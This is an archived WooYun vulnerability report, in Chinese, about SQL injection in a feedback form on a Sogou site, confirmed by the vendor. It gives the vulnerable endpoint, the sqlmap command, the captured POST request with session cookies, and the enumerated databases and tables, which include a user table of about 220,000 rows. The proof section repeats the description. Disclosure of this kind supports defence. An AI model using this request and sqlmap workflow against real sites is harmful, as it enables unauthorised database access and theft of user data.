当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0208814

漏洞标题:搜狗某处SQL注入泄露22w用户信息

相关厂商:搜狗

漏洞作者: 黑色键盘丶

提交时间:2016-05-15 10:24

修复时间:2016-06-30 08:20

公开时间:2016-06-30 08:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-05-15: 细节已通知厂商并且等待厂商处理中
2016-05-16: 厂商已经确认,细节仅向厂商公开
2016-05-26: 细节向核心白帽子及相关领域专家公开
2016-06-05: 细节向普通白帽子公开
2016-06-15: 细节向实习白帽子公开
2016-06-30: 细节向公众公开

简要描述:

RT

详细说明:

http://fankui.help.sogou.com/index.php/web/web/index?type=6 抓包看了下 加个单引号报错防不胜防


111.png


sqlmap语法:sqlmap.py -r 1.txt --dbs
----------------数据包-------
POST /index.php/web/web/addShenSu HTTP/1.1
Host: fankui.help.sogou.com
Proxy-Connection: keep-alive
Content-Length: 120
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://fankui.help.sogou.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://fankui.help.sogou.com/index.php/web/web/index?type=6
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: SUV=00D41AA9DE4930F75734A445360CE715; SNUID=465E0E96474D7AE00298446D48C4D629; SUID=0E1649DE2208990A000000005734A933; m=45390C4EEF5AF7959CC32A4FFB401114; GOTO=Af99046; ld=Hkllllllll2g2sZqlllllVtL@xUlllllT66QhZllll9lllllRklll5@@@@@@@@@@; YYID=45390C4EEF5AF7959CC32A4FFB401114; LSTMV=320%2C69; LCLKINT=1145; usid=eJINqnJQY9tgFkkg; IPLOC=CN3302; PHPSESSID=bh2gtfs2om3k7a19bom6okc260
Shensu%5BwebAdr%5D=http%3A%2F%2Fwww.sogou.com%2F&Shensu%5Breason%5D=1&Shensu%5Bcontact%5D=313%40q.com&webContactWayType=


数据库信息
available databases [3]:
[*] information_schema
[*] sogou_zhanzhang
[*] test


当前库表信息
Database: sogou_zhanzhang
+-------------------------------+---------+
| Table | Entries |
+-------------------------------+---------+
| deadlink_wap_data | 15191050 |
| url_submit | 547950 |
| url_submit_view | 547950 |
| website | 270697 |
| website_view | 270697 |
| `user` | 220754 |
| sitemap | 175918 |
| sitemap_copy | 175417 |
| sitemap_view | 168249 |
| site_name | 73232 |
| website_precision | 67856 |
| site_name_view | 65060 |
| fault_block_log | 54773 |
| sitemap_wap | 52806 |
| fault_block | 51056 |
| sitemap_wap_view | 48773 |
| sitemap_invitation | 45320 |
| sitemap_invitation_view | 43771 |
| site_icon | 42416 |
| site_icon_view | 42067 |
| spider_pressure_feedback | 31070 |
| sitemap_invitation_log | 28583 |
| site_logo | 27750 |
| site_logo_view | 25608 |
| site_name_log | 24155 |
| spider_pressure_feedback_view | 23755 |
| web2wap | 20046 |
| web2wap_view | 19268 |
| site_logo_log | 17607 |
| renzheng_log | 16555 |
| supply_fetch | 14501 |
| site_icon_log | 13925 |
| renzheng | 9324 |
| fb_updateshensu | 5427 |
| fb_shensu | 5341 |
| web2wap_log | 4917 |
| fb_img | 3720 |
| redirection | 3696 |
| redirection_view | 3696 |
| tb_member | 3682 |
| feedback | 3270 |
| fb_tool | 2906 |
| feedback_view | 2773 |
| url_shoulu | 2577 |
| umis_waitingfavicon_log | 2568 |
| umis_waitingfavicon | 2520 |
| site_param | 1992 |
| sitemap_blacklist | 1917 |
| site_param_view | 1825 |
| website_precision_log | 1064 |
| user_change_log | 968 |
| redirection_log | 561 |
| fb_suggestion | 289 |
| fb_jubao | 201 |
| fb_record | 153 |
| renzheng_set | 106 |
| fb_kuaizhao | 81 |
| mail_view | 78 |
| backend_user | 74 |
| website_log | 63 |
| product_black_list | 24 |
| user_invitation | 19 |
| notice | 18 |
| fb_updatetool | 14 |
| website_precision_maxid | 7 |
| columnist | 5 |
| partner_white_list | 5 |
| mail_group | 1 |
| site_param_log | 1 |
+-------------------------------+---------+

漏洞证明:

http://fankui.help.sogou.com/index.php/web/web/index?type=6 抓包看了下 加个单引号报错防不胜防


111.png


sqlmap语法:sqlmap.py -r 1.txt --dbs
----------------数据包-------
POST /index.php/web/web/addShenSu HTTP/1.1
Host: fankui.help.sogou.com
Proxy-Connection: keep-alive
Content-Length: 120
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://fankui.help.sogou.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://fankui.help.sogou.com/index.php/web/web/index?type=6
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: SUV=00D41AA9DE4930F75734A445360CE715; SNUID=465E0E96474D7AE00298446D48C4D629; SUID=0E1649DE2208990A000000005734A933; m=45390C4EEF5AF7959CC32A4FFB401114; GOTO=Af99046; ld=Hkllllllll2g2sZqlllllVtL@xUlllllT66QhZllll9lllllRklll5@@@@@@@@@@; YYID=45390C4EEF5AF7959CC32A4FFB401114; LSTMV=320%2C69; LCLKINT=1145; usid=eJINqnJQY9tgFkkg; IPLOC=CN3302; PHPSESSID=bh2gtfs2om3k7a19bom6okc260
Shensu%5BwebAdr%5D=http%3A%2F%2Fwww.sogou.com%2F&Shensu%5Breason%5D=1&Shensu%5Bcontact%5D=313%40q.com&webContactWayType=


数据库信息
available databases [3]:
[*] information_schema
[*] sogou_zhanzhang
[*] test


当前库表信息
Database: sogou_zhanzhang
+-------------------------------+---------+
| Table | Entries |
+-------------------------------+---------+
| deadlink_wap_data | 15191050 |
| url_submit | 547950 |
| url_submit_view | 547950 |
| website | 270697 |
| website_view | 270697 |
| `user` | 220754 |
| sitemap | 175918 |
| sitemap_copy | 175417 |
| sitemap_view | 168249 |
| site_name | 73232 |
| website_precision | 67856 |
| site_name_view | 65060 |
| fault_block_log | 54773 |
| sitemap_wap | 52806 |
| fault_block | 51056 |
| sitemap_wap_view | 48773 |
| sitemap_invitation | 45320 |
| sitemap_invitation_view | 43771 |
| site_icon | 42416 |
| site_icon_view | 42067 |
| spider_pressure_feedback | 31070 |
| sitemap_invitation_log | 28583 |
| site_logo | 27750 |
| site_logo_view | 25608 |
| site_name_log | 24155 |
| spider_pressure_feedback_view | 23755 |
| web2wap | 20046 |
| web2wap_view | 19268 |
| site_logo_log | 17607 |
| renzheng_log | 16555 |
| supply_fetch | 14501 |
| site_icon_log | 13925 |
| renzheng | 9324 |
| fb_updateshensu | 5427 |
| fb_shensu | 5341 |
| web2wap_log | 4917 |
| fb_img | 3720 |
| redirection | 3696 |
| redirection_view | 3696 |
| tb_member | 3682 |
| feedback | 3270 |
| fb_tool | 2906 |
| feedback_view | 2773 |
| url_shoulu | 2577 |
| umis_waitingfavicon_log | 2568 |
| umis_waitingfavicon | 2520 |
| site_param | 1992 |
| sitemap_blacklist | 1917 |
| site_param_view | 1825 |
| website_precision_log | 1064 |
| user_change_log | 968 |
| redirection_log | 561 |
| fb_suggestion | 289 |
| fb_jubao | 201 |
| fb_record | 153 |
| renzheng_set | 106 |
| fb_kuaizhao | 81 |
| mail_view | 78 |
| backend_user | 74 |
| website_log | 63 |
| product_black_list | 24 |
| user_invitation | 19 |
| notice | 18 |
| fb_updatetool | 14 |
| website_precision_maxid | 7 |
| columnist | 5 |
| partner_white_list | 5 |
| mail_group | 1 |
| site_param_log | 1 |
+-------------------------------+---------+

修复方案:

过滤

版权声明:转载请注明来源 黑色键盘丶@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-05-16 08:12

厂商回复:

感谢支持

最新状态:

暂无


漏洞评价:

评价